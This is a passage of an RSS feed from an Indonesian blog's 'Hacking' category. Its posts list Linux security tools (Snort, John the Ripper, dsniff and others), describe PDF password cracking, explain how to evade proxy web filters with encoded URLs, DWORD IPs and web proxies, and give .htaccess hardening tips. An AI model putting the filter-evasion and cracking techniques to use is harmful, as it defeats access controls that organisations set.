<p style="text-align: justify;"><strong>Rkhunter &#8211;  Rootkit, backdoor, sniffer and exploit scanner</strong></p>
<p style="text-align: justify;">Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.</p>
<p style="text-align: justify;">Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:</p>
<p style="text-align: justify;">- MD5 hash changes;</p>
<p style="text-align: justify;">- files commonly created by rootkits;</p>
<p style="text-align: justify;">- executables with anomalous file permissions;</p>
<p style="text-align: justify;">- suspicious strings in kernel modules;</p>
<p style="text-align: justify;">- hidden files in system directories;</p>
<p style="text-align: justify;">Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.</p>
<p style="text-align: justify;">Install Rkhunter:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install rkhunter</p></blockquote>
<p style="text-align: justify;"><strong>TCPDump &#8211; A powerful tool for network monitoring and data acquisition</strong></p>
<p style="text-align: justify;">Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.</p>
<p style="text-align: justify;">Instal TCPDump:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install tcpdump</p></blockquote>
<p style="text-align: justify;"><strong>SNORT &#8211; Flexible Network Intrusion Detection System</strong></p>
<p style="text-align: justify;">Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di  jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.</p>
<p style="text-align: justify;">Instal Snort:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install snort</p></blockquote>
<p style="text-align: justify;"><strong>Firestarter &#8211; program for managing and observing your firewall</strong></p>
<p style="text-align: justify;">Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.</p>
<p style="text-align: justify;">Instal firestarter:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install firestarter</p></blockquote>
<p style="text-align: justify;"><strong>CLAMAV &#8211; anti-virus utility for Unix</strong></p>
<p style="text-align: justify;">Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:</p>
<p style="text-align: justify;">- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya</p>
<p style="text-align: justify;">- seluruh format file mail</p>
<p style="text-align: justify;">- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.</p>
<p style="text-align: justify;">Instal Clamav:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install clamav</p></blockquote>
<p style="text-align: justify;"><strong>Netcat &#8211; TCP/IP swiss army knife</strong></p>
<p style="text-align: justify;">Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.</p>
<p style="text-align: justify;">Instal Netcat:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install netcat</p></blockquote>
<p style="text-align: justify;"><strong>John</strong></p>
<p style="text-align: justify;">Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.</p>
<p style="text-align: justify;">Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.</p>
<p style="text-align: justify;">Instal John the Ripper:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install john</p></blockquote>
<p style="text-align: justify;"><strong>Dnsniff &#8211; Various tools to sniff network traffic for cleartext insecurities</strong></p>
<p style="text-align: justify;">Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.</p>
<p style="text-align: justify;">Sub-sub tools itu adalah berikuti ini:</p>
<p style="text-align: justify;">* arpspoof &#8211; Send out unrequested (and possibly forged) arp replies.</p>
<p style="text-align: justify;">* dnsspoof &#8211; forge replies to arbitrary DNS address / pointer queries on the Local Area Network.</p>
<p style="text-align: justify;">* dsniff &#8211; password sniffer for several protocols.</p>
<p style="text-align: justify;">* filesnarf &#8211; saves selected files sniffed from NFS traffic.</p>
<p style="text-align: justify;">* macof &#8211; flood the local network with random MAC addresses.</p>
<p style="text-align: justify;">* mailsnarf &#8211; sniffs mail on the LAN and stores it in mbox format.</p>
<p style="text-align: justify;">* msgsnarf &#8211; record selected messages from different Instant Messengers.</p>
<p style="text-align: justify;">* sshmitm &#8211; SSH monkey-in-the-middle. proxies and sniffs SSH traffic.</p>
<p style="text-align: justify;">* sshow &#8211; SSH traffic analyser.</p>
<p style="text-align: justify;">* tcpkill &#8211; kills specified in-progress TCP connections.</p>
<p style="text-align: justify;">* tcpnice &#8211; slow down specified TCP connections via “active” traffic shaping.</p>
<p style="text-align: justify;">* urlsnarf &#8211; output selected URLs sniffed from HTTP traffic in CLF.</p>
<p style="text-align: justify;">* webmitm &#8211; HTTP / HTTPS monkey-in-the-middle. transparently proxies.</p>
<p style="text-align: justify;">* webspy &#8211; sends URLs sniffed from a client to your local browser (requires libx11-6 installed).</p>
<p style="text-align: justify;">Install dsniff:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install dsniff</p></blockquote>
<p style="text-align: justify;">
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/security-hacking-tools-di-ubuntu/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>Membuka Dokumen PDF Yang Diproteksi Dengan Password</title>
		<link>http://adhit.web.id/membuka-dokumen-pdf-yang-diproteksi-dengan-password/</link>
		<comments>http://adhit.web.id/membuka-dokumen-pdf-yang-diproteksi-dengan-password/#comments</comments>
		<pubDate>Thu, 25 Jun 2009 15:56:26 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[PDF]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=75</guid>
		<description><![CDATA[Ada beberapa alasan mendasar untuk membuka file PDF yang terproteksi. Anda mungkin ingin membuka dokumen PDF yang terenkripsi tapi lupa passwordnya seperti kasus dibawah. Misalkan rekan kerja Anda membuat laporan penjualan dalam format PDF, tapi dia tidak lagi bekerja di perusahaan tempat Anda bekerja. Ada dua tipe dasar dalam proteksi PDF &#8211; pembuat PDF asli [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/06/pdf.jpg"><img class="alignleft size-full wp-image-76" title="pdf" src="http://adhit.web.id/wp-content/uploads/2009/06/pdf.jpg" alt="pdf Membuka Dokumen PDF Yang Diproteksi Dengan Password" width="131" height="128" /></a>Ada beberapa alasan mendasar untuk membuka file PDF yang terproteksi. Anda mungkin ingin membuka dokumen PDF yang terenkripsi tapi lupa passwordnya seperti kasus dibawah.</p>
<p style="text-align: justify;">Misalkan rekan kerja Anda membuat laporan penjualan dalam format PDF, tapi dia tidak lagi bekerja di perusahaan tempat Anda bekerja.</p>
<p style="text-align: justify;">Ada dua tipe dasar dalam proteksi PDF &#8211; pembuat PDF asli dapat membatasi membuka file PDF dan membatasi orang lain untuk memodifikasi, mencetak, atau menyalin teks dan grafik dari file PDF tersebut. Berikut beberapa kemungkinan yang dapat dilakukan:</p>
<p style="text-align: justify;"><span id="more-75"></span></p>
<p style="text-align: justify;"><strong>Jika itu adalah pembatasan untuk menyalin atau mencetak.</strong></p>
<p style="text-align: justify;">Buka dokumen dalam Acrobat Reader atau Foxit dan capture halaman PDF sebagai image. Atau jika terdapat lebih dari satu halaman, Anda bisa menggunakan SnagIt karena dapat melakukan autoscroll dan capture banyak halaman dalam satu operasi.</p>
<p style="text-align: justify;">Sebagai alternatif, Anda bisa berinvestasi pada program komersial seperti Advanced PDF Password Recovery dari <a href="http://www.elcomsoft.com/apdfpr.html" target="_blank">ElcomSoft</a> dan PDF Password Remover dari <a href="http://www.verypdf.com/pwdremover/index.htm" target="_blank">Very PDF</a>.</p>
<p style="text-align: justify;">(Utilitas ini tidak mencari password untuk Anda, hanya menghilangkan batasan-batasan dari file yang diproteksi password)</p>
<p style="text-align: justify;"><strong>Jika itu adalah pembatasan membuka dokumen. </strong></p>
<p style="text-align: justify;">Ini adalah kasus paling sulit dan tidak ada solusi untuk membaca dokumen PDF yang di proteksi dengan password pada level Open.</p>
<p style="text-align: justify;">Software yang bisa digunakan adalah yang memakai metode seperti Brute Force, Key Search dan Dictionary Attack untuk menebak password-nya. Mereka akan mencoba menggunakan semua kemungkinan kombinasi karakter sebagai password dan juga proses ini akan memakan waktu berjam-jam bahwah berhari-hari tergantung dari kecepatan komputer yang digunakan.</p>
<p style="text-align: justify;"><em>Advanced PDF Password Recovery Professional Edition</em> dari ElcomSoft direkomendasikan sebagai pilihan. Jika password ditemukan, program akan memperlihatkannya, begitu juga jumlah passowrd yang telah digunakan untuk testing.</p>
<p style="text-align: justify;"><em>Isu Legalitas</em> : &#8211; Anda mungkin terkejut mengetahui bahwa software PDF password cracking ini adalah legal dan bahkan Microsoft mememberikan status untuk ElcomSoft sebagai Gold Certified Partner.</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/membuka-dokumen-pdf-yang-diproteksi-dengan-password/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mengelabui Sistem Blok Web Dengan Memodifikasi Keyword dan URL</title>
		<link>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-memodifikasi-keyword-dan-url/</link>
		<comments>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-memodifikasi-keyword-dan-url/#comments</comments>
		<pubDate>Tue, 23 Jun 2009 10:20:28 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[acl squid]]></category>
		<category><![CDATA[bypass blocking web]]></category>
		<category><![CDATA[proxy server]]></category>
		<category><![CDATA[squidguard]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=60</guid>
		<description><![CDATA[Setelah pada artikel sebelumnya kita mencoba membypass blocking web dengan bantuan proxy, pada artikel baru ini akan diterangkan trik yang lebih sederhana, namun lebih cepat karena bisa dilakukan tanpa proxy. Cara ini terbukti ampuh dalam mengecoh sistem filtering web yang umumnya diterapkan pada proxy server, termasuk filtering menggunakan proxy server semacam squid (teknik ACL dan [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Setelah pada artikel sebelumnya kita mencoba <a href="http://adhit.web.id/mengelabui-sistem-blok-web-dengan-web-proxy/" target="_blank">membypass blocking web dengan bantuan proxy</a>, pada artikel baru ini akan diterangkan trik yang lebih sederhana, namun lebih cepat karena bisa dilakukan tanpa proxy. Cara ini terbukti ampuh dalam mengecoh sistem filtering web yang umumnya diterapkan pada proxy server, termasuk filtering menggunakan proxy server semacam squid (teknik ACL dan Squidguard).</p>
<p style="text-align: justify;">Adapun teknik ACL dan Squidguard hanya mengandalkan filtering dari 2 sisi. Yang pertama yakni blokir berdasarkan url, dan kedua blokir berdasarkan keyword yang terkandung dalam url. Nah disinilah kelemahan utamanya. Cukup dengan memodifikasi keyword atau url suatu website, kita dapat dengan mudah mengelabui dan menipu aplikasi filtering. (Lihat ilustrasi dibawah ini)</p>
<div id="attachment_61" class="wp-caption aligncenter" style="width: 310px"><a href="http://adhit.web.id/wp-content/uploads/2009/06/blokir-server-client2.png"><img class="size-medium wp-image-61" title="blokir-server-client2" src="http://adhit.web.id/wp-content/uploads/2009/06/blokir-server-client2-300x138.png" alt="blokir server client2 300x138 Mengelabui Sistem Blok Web Dengan Memodifikasi Keyword dan URL" width="300" height="138" /></a><p class="wp-caption-text">Mekanisme SquidGuard</p></div>
<p style="text-align: justify;"><span id="more-60"></span></p>
<p style="text-align: justify;">Dalam ilustrasi diatas digambarkan komputer user terhubung ke internet melalui SquidGuard. Seluruh web yg akan dibuka di sensor dulu oleh si Squid Quard ini. Berhubung situs sosial yang lagi populer yaitu facebook.com, maka saya mengganti alamat friendster.com menjadi facebook.com. Terlihat disana si admin memblokir akses ke situs facebook.com. Ketika user membuka alamat tersebut maka yang didapatnya adalah error. Tak habis akal si user mencoba mengaksesnya dengan alamat <a href="http://1161801868/" target="_blank">http://1161801868/</a> . Lho facebook.com bisa dibuka!</p>
<p style="text-align: justify;">Bagaimana logikanya? Sebenarnya yang diakses oleh si user itu adalah alamat IP dari facebook dalam bentuk bilangan DWORDS. Bagaimana cara untuk mengetahui IP facebook? Cara termudah yakni dengan melakukan tes ping. Namun tentu saja ping tidak akan bisa dilakukan bila facebook atau IP realnya sendiri di blokir. Untuk itu kita bisa mengakali dengan minta bantuan web web yang menyediakan jasa ping gratisan. Cari saja dengan google, kata kuncinya “<em>Free ping services</em>”. Salah satu contohnya :</p>
<blockquote><p><a href="http://network-tools.com/" target="_blank">http://network-tools.com/</a></p></blockquote>
<p style="text-align: justify;">Contoh request ping nya seperti ini:</p>
<blockquote><p><a href="http://network-tools.com/default.asp?prog=ping&amp;host=facebook.com" target="_blank">http://network-tools.com/default.asp?prog=ping&amp;host=facebook.com</a></p></blockquote>
<p style="text-align: justify;">Wew GAGAL! rupanya si SquidGuard otomatis memblokir semua url yang mengandung kata facebook.com. Bisa dicounter? Mudah kita ubah saja facebook.com menjadi bentuk hexa-nya.</p>
<p style="text-align: justify;">Caranya? Gunakan saja tools hasil searching di google (Ascii to hex translator) seperti ini:</p>
<blockquote><p><a href="http://converter.adhit.web.id/" target="_blank">http://converter.adhit.web.id/</a></p></blockquote>
<p>Hasilnya facebook.com = %66%61%63%65%62%6F%6F%6B%2E%63%6F%6D</p>
<p style="text-align: justify;">jadi request pingnya menjadi:</p>
<blockquote><p><a href="http://network-tools.com/default.asp?prog=ping&amp;host=%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D" target="_blank">http://network-tools.com/default.asp?prog=ping&amp;host=%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D</a></p></blockquote>
<p style="text-align: justify;">dan seperti yang diharapkan ip facebook didapatkan: <strong><span style="font-family: Arial; font-size: x-small;">69.63.176.140</span></strong></p>
<p style="text-align: justify;">Tentu saja IP ini ga bisa langsung dimasukkan dalam url berhubung IP ini udah keduluan di blokir <img src='http://adhit.web.id/wp-includes/images/smilies/icon_wink.gif' alt="icon wink Mengelabui Sistem Blok Web Dengan Memodifikasi Keyword dan URL" class='wp-smiley' title="Mengelabui Sistem Blok Web Dengan Memodifikasi Keyword dan URL" />  Langkah selanjutnya yakni dengan memalsukan IP ini dalam bentuk bilang DWORDS. Selain DWORDS bisa juga diconvert dalam bentu hex dan octa. Hal ini karena tidak selalu IP yang di convert dalam bentuk dwords requestnya di balas oleh server penerima.</p>
<p style="text-align: justify;">Caranya kita bisa gunakan tools converter sederhana seperti di sini:</p>
<blockquote><p><a href="http://converter.adhit.web.id/" target="_blank">http://converter.adhit.web.id/</a></p></blockquote>
<p style="text-align: justify;">Didapatkan facebook.com sama dengan:</p>
<p style="text-align: justify;">* <a href="http://1161801868" target="_blank">http://1161801868</a></p>
<p style="text-align: justify;">* <a href="http://0x45.0x3f.0xb0.0x8c" target="_blank">http://0&#215;45.0x3f.0xb0.0x8c</a></p>
<p style="text-align: justify;">* <a href="http://0105.0077.0260.0214" target="_blank">http://0105.0077.0260.0214</a></p>
<p style="text-align: justify;">Untuk mengubah IP ke dalam bentuk bilangan hex atau oct anda bisa juga memanfaatkan google. caranya cukup masukkan di kolom search seperti ini (209 ke dalam bentuk hex):</p>
<blockquote><p><a href="http://www.google.co.id/search?q=69+in+hex" target="_blank">http://www.google.co.id/search?q=69+in+hex</a></p></blockquote>
<p>hasilnya:</p>
<p><strong>69 = 0&#215;45</strong></p>
<p style="text-align: justify;">Selanjutnya tinggal anda gabung gabungkan saja dan dipisahkan dengan notasi titik (.) dan tentunya facebook.com disini hanyalah salah satu contoh dalam ilustrasinya, dan Anda juga dapat mengunakannya terhadap alamat-alamat situs lainnya.</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-memodifikasi-keyword-dan-url/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Mengelabui Sistem Blok Web Dengan Web Proxy</title>
		<link>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-web-proxy/</link>
		<comments>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-web-proxy/#comments</comments>
		<pubDate>Tue, 23 Jun 2009 09:26:26 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[bypass blocking web]]></category>
		<category><![CDATA[proxy server]]></category>
		<category><![CDATA[web proxy]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=54</guid>
		<description><![CDATA[Apakah Anda pernah merasa kesal karena situs kesayangan Anda tidak bisa dibuka? Dan setelah Anda cek rupanya alasan tidak bisa dibukanya karena situs tersebut di blokir oleh proxy server kantor atau ISP Anda? Namun web lain dapat dibuka? Hmm.. Anda tidak perlu khawatir. Karena Anda masih bisa tetap mengakses situs kesayangan Anda tersebut. Tidak perlu [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Apakah Anda pernah merasa kesal karena situs kesayangan Anda tidak bisa dibuka? Dan setelah Anda cek rupanya alasan tidak bisa dibukanya karena situs tersebut di blokir oleh proxy server kantor atau ISP Anda? Namun web lain dapat dibuka? Hmm.. Anda tidak perlu khawatir. Karena Anda masih bisa tetap mengakses situs kesayangan Anda tersebut. Tidak perlu install program, bahkan tidak perlu ubah setingan apapun di browser Anda. Mau tahu bagaimana caranya?</p>
<div id="attachment_55" class="wp-caption aligncenter" style="width: 310px"><a href="http://adhit.web.id/wp-content/uploads/2009/06/blokir-server-client.png"><img class="size-medium wp-image-55" title="blokir-server-client" src="http://adhit.web.id/wp-content/uploads/2009/06/blokir-server-client-300x189.png" alt="blokir server client 300x189 Mengelabui Sistem Blok Web Dengan Web Proxy" width="300" height="189" /></a><p class="wp-caption-text">Ilustrasi pemanfaatan web proxy untuk mem-bypass filtering</p></div>
<p><span id="more-54"></span></p>
<p style="text-align: justify;">Anda cukup membuka situs tersebut lewat bantuan perantara web proxy (lihat gambar diatas). Maksudnya web proxy, adalah layanan web yang memungkinkan Anda meminta kepada situs web proxy tersebut untuk men download kan tampilan situs yang Anda inginkan. Selanjutnya hasilnya di kirimkan kembali ke layar browser Anda. Jadi istilahnya anda membuka situs target lewat perantara. Misalnya Anda dapat mengakses situs yang Anda inginkan melalui <a href="http://a1proxy.co.cc/" target="_blank">a1proxy.co.cc</a> seperti pada gambar berikut ini, Anda tinggal memasukkan alamat situs yang ingin Anda buka.</p>
<div id="attachment_56" class="wp-caption aligncenter" style="width: 310px"><a href="http://adhit.web.id/wp-content/uploads/2009/06/a1proxy.JPG"><img class="size-medium wp-image-56" title="a1proxy" src="http://adhit.web.id/wp-content/uploads/2009/06/a1proxy-300x146.jpg" alt="a1proxy 300x146 Mengelabui Sistem Blok Web Dengan Web Proxy" width="300" height="146" /></a><p class="wp-caption-text">a1proxy.co.cc web proxy</p></div>
<p style="text-align: justify;">Penggunaan web proxy juga berguna menyembunyikan IP Address Anda. Selain itu Anda juga bisa memanfaatkan situs-situs yang menawarkan php web proxy. Sekali lagi anda bisa manfaatkan google untuk mencarikannya. Keywordnya: “<strong>PHP Web Proxy</strong>”</p>
<p style="text-align: justify;">Selamat browsing..</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/mengelabui-sistem-blok-web-dengan-web-proxy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tips Menggunakan htaccess Pada Apache Web Server</title>
		<link>http://adhit.web.id/tips-menggunakan-htaccess-pada-apache-web-server/</link>
		<comments>http://adhit.web.id/tips-menggunakan-htaccess-pada-apache-web-server/#comments</comments>
		<pubDate>Thu, 18 Jun 2009 17:18:51 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[setting]]></category>
		<category><![CDATA[web server]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=45</guid>
		<description><![CDATA[Security / Keamanan Web merupakan bagian yang sangat penting dalam pengelolaan web. Tanpa penerapan security yang bagus, web kita akan mudah dirusak / dibobol oleh orang lain. Menerapkan security pada web salah satunya dapat menambahkan beberapa kode kedalam file htaccess. Berikut beberapa tips security yang dapat kita gunakan dengan file htaccess: Mencegah Mengakses File .htaccess [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><em><a href="http://adhit.web.id/wp-content/uploads/2009/06/apache-logo.jpg"><img class="alignleft size-full wp-image-46" title="apache-logo" src="http://adhit.web.id/wp-content/uploads/2009/06/apache-logo.jpg" alt="apache logo Tips Menggunakan htaccess Pada Apache Web Server" width="200" height="96" /></a>Security </em>/ Keamanan Web merupakan bagian yang sangat penting dalam pengelolaan web.  Tanpa penerapan <em>security </em>yang bagus, web kita akan mudah dirusak / dibobol oleh orang lain.  Menerapkan <em>security </em>pada web salah satunya dapat menambahkan beberapa kode kedalam file <strong>htaccess</strong>.</p>
<p align="justify">Berikut beberapa tips <em>security </em>yang dapat kita gunakan dengan file <strong>htaccess</strong>:</p>
<p align="justify"><strong>Mencegah Mengakses File .htaccess</strong></p>
<p align="justify">File <strong>.htaccess</strong> merupakan file yang sangat penting bagi website kita.  File ini harus diberikan <em>security </em>agar tidak dapat diakses oleh orang lain.  Ketika ada yang mengakses file <strong>.htaccess</strong> biasanya akan timbul pesan <em>error </em>403.  Itu disebabkan karena setting <em>permission</em>nya didalam <em>server hosting </em>telah menggunakan CHMOD 644, yang mengakibatkan file ini tidak dapat diakses oleh publik. Tetapi jika kita ingin menambahkan security pada file <strong>.htaccess</strong> kita dapat menambahkan kode berikut:</p>
<p align="justify"><span id="more-45"></span></p>
<blockquote>
<p align="left"><code># security file htaccess</code><br />
<code>&lt;Files .</code><code>htaccess&gt;</code><br />
<code>order allow,deny</code><br />
<code>deny from all</code><br />
<code>&lt;/Files&gt;</code></p></blockquote>
<p align="justify"><strong>Mencegah Mengakses File Khusus</strong></p>
<p align="justify">Untuk mencegah agar pengunjung website tidak dapat mengakses file-file khusus, kita dapat menambahkan beberapa kode dalam file <strong>.htaccess</strong>, dengan menspesifikasikan nama file tersebut.</p>
<blockquote>
<p align="left"><code># mencegah melihat file khusus</code><br />
<code>&lt;files secretfile.jpg&gt;</code><br />
<code>order allow,deny</code><br />
<code>deny from all</code><br />
<code>&lt;/files&gt;</code></p></blockquote>
<p align="justify">Arti dari kode tersebut adalah bahwa file secretfile.jpg telah diblok dan tidak dapat dilihat atau diakses oleh pengunjung.</p>
<p align="justify"><strong>Mencegah Mengakses Beberapa Tipe File</strong></p>
<p align="justify">Untuk mencegah pengunjung web agar tidak dapat mengakses beberapa tipe file khusus, kita dapat menambahkan kode pada file <strong>.htaccess </strong>sebagai berikut:</p>
<blockquote>
<p align="left"><code>&lt;FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$"&gt;</code><br />
<code>Order Allow,Deny</code><br />
<code>Deny from all</code><br />
<code>&lt;/FilesMatch&gt;</code></p></blockquote>
<p align="justify">Arti dari kode tersebut adalah bahwa file yang berekstension htaccess, htpasswd, ini, phps, fla, psd, log dan sh telah di blok dan tidak dapat dilihat atau diakses oleh pengunjung secara langsung.</p>
<p align="justify"><strong>Mencegah Browsing Direktori</strong></p>
<p align="justify">Jika dalam direktori di <em>server hosting </em>kita tidak terdapat ada <em>index</em>-nya, maka pengunjung akan dapat mengakses dan browsing ke dalam <em>server hosting </em>kita pada saat mengakses direktori tersebut. Demi keamanan website kita, hal ini harus kita cegah dengan menambahkan beberapa kode kedalam file <strong>.htaccess</strong></p>
<blockquote>
<p align="left"><code># disable directory browsing</code><br />
<code>Options All -Indexes</code></p></blockquote>
<p align="left">Kebalikannya, untuk mengaktifkan agar dapat browsing ke direktori, kita dapat gunakan kode:</p>
<blockquote>
<p align="left"><code># enable directory browsing</code><br />
<code>Options All +Indexes</code></p></blockquote>
<p align="justify">Jika ingin mencegah untuk melihat daftar dari isi direktori kita dapat gunakan kode:</p>
<blockquote>
<p align="left"><code># mencegah melihat isi direktori / folder</code><br />
<code>IndexIgnore *</code></p></blockquote>
<p align="justify">Jika kita ingin mencegah untuk tipe-tipe file tertentu kita dapat menambahkan kode:</p>
<blockquote>
<p align="left"><code># mencegah menampilkan tipe file tertentu dalam direktori</code><br />
<code>IndexIgnore *.wmv *.mp4 *.avi *.etc</code></p></blockquote>
<p align="justify"><strong>Mengganti Default Halaman Index</strong></p>
<p align="justify">Halaman <em>index </em>kadang menjadi sasaran untuk dibobol / dihack oleh orang lain, jika dirasa sangat perlu demi keamanan website, kita dapat mengganti halaman <em>index </em>dengan menggunakan nama file lain.  Misalkan kita ingin mengganti halaman <em>index </em>dengan menggunakan nama file &#8220;bisnis.html&#8221;, maka kita dapat menambahkan kode pada file <strong>.htaccess</strong> sebagai berikut:</p>
<blockquote>
<p align="left"><code># mengganti halaman index</code><br />
<code>DirectoryIndex bisnis.html</code></p></blockquote>
<p align="justify">Untuk mengganti urutan dari halaman <em>index</em>, kita dapat menggunakan kode berikut:</p>
<blockquote>
<p align="left"><code># Mengubah urutan halaman index</code><br />
<code>DirectoryIndex namafile.html index.cgi index.pl default.htm</code></p></blockquote>
<p align="left"><strong>Membuat Redirect pada saat memperbaiki atau mengupdate website.</strong></p>
<p align="justify">Jika kita ingin memperbaiki website, entah itu saat mengganti desain website atau memperbaiki kerusakan-kerusakan yang lain, sehingga pada saat orang lain mengunjungi website kita masih terlihat adanya kerusakan pada website. Bagi seorang <em>webmaster</em>, hal tersebut haruslah dihindari karena untuk menjaga keprofesionalan dari website tersebut. Untuk menghindarinya kita dapat mengarahkan pengunjung secara langsung dengan melakukan <em><strong>redirect </strong></em>kehalaman lain, dimana halaman tersebut dapat berisi pesan bahwa website yang kita kelola tersebut masih diperbaiki.</p>
<p align="justify">Untuk melakukan <em>redirect </em>kita dapat menambahkan beberapa kode kedalam file <strong>.htaccess</strong>, sebagai berikut :</p>
<blockquote>
<p align="left"><code>order deny,allow<br />
deny from all<br />
allow from 123.123.123.123</code></p>
<p align="left"><code>ErrorDocument 403 /page.html</code></p>
<p align="left"><code>&lt;Files page.html&gt;<br />
allow from all<br />
&lt;/Files&gt;</code></p></blockquote>
<p align="justify">Kita harus mengganti 123.123.123.123 dengan IP <em>address</em> dari komputer kita agar kita masih dapat melihat perubahan yang terjadi sebelum untuk konsumsi publik. Kita juga harus mengganti <strong>page.html</strong> dengan nama file halaman sesuai dengan file yang kita buat. File ini adalah halaman yang dilihat pengunjung saat kita melakukan perbaikan.</p>
<p align="justify">Setelah perbaikan dianggap selesai kita harus menghapus kembali kode diatas agar pengunjung dapat menikmati kembali website kita.</p>
<p align="justify"><strong>Menampilkan Halaman <em>Error </em>404</strong></p>
<p align="justify">Pada saat pengunjung website melihat suatu alamat URL dalam website kita tetapi alamat tersebut tidak ada dalam website maka didalam browser akan muncul pesan <em>error </em>yaitu &#8220;<strong><em>404 File Not Found</em></strong>&#8220;.  Agar kelihatan lebih profesional website kita, pesan <em>error </em>ini dapat kita ganti dengan sebuah halaman yang kita definisikan sendiri pesannya, dengan cara menambahkan kode pada file <strong>.htaccess</strong> sebagai berikut:</p>
<blockquote>
<p align="left"><code>ErrorDocument 404 /404.html</code></p>
</blockquote>
<p align="justify">Kita dapat mengganti <em>404.html</em> sesuai dengan nama file  yang kita buat. Jadi saat terjadi <em>error </em>404, pengunjung akan melihat halaman file tersebut.</p>
<p align="left"><strong>Memindah atau Mengganti Nama File</strong></p>
<p align="justify">Jika kita pernah memindah atau mengganti nama halaman dalam website kita, maka kita wajib melakukan <strong><em>Redirect </em></strong>agar pengunjung yang melihat halaman yang lama dapat langsung mengarah melihat halaman yang baru. Untuk melakukan itu dapat dilakukan dengan menambahkan kode pada file <strong>.htaccess</strong> sebagai berikut:</p>
<blockquote>
<p align="left"><code>Redirect 301 /lama.html http://domainanda.com/baru.html</code></p>
</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/tips-menggunakan-htaccess-pada-apache-web-server/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

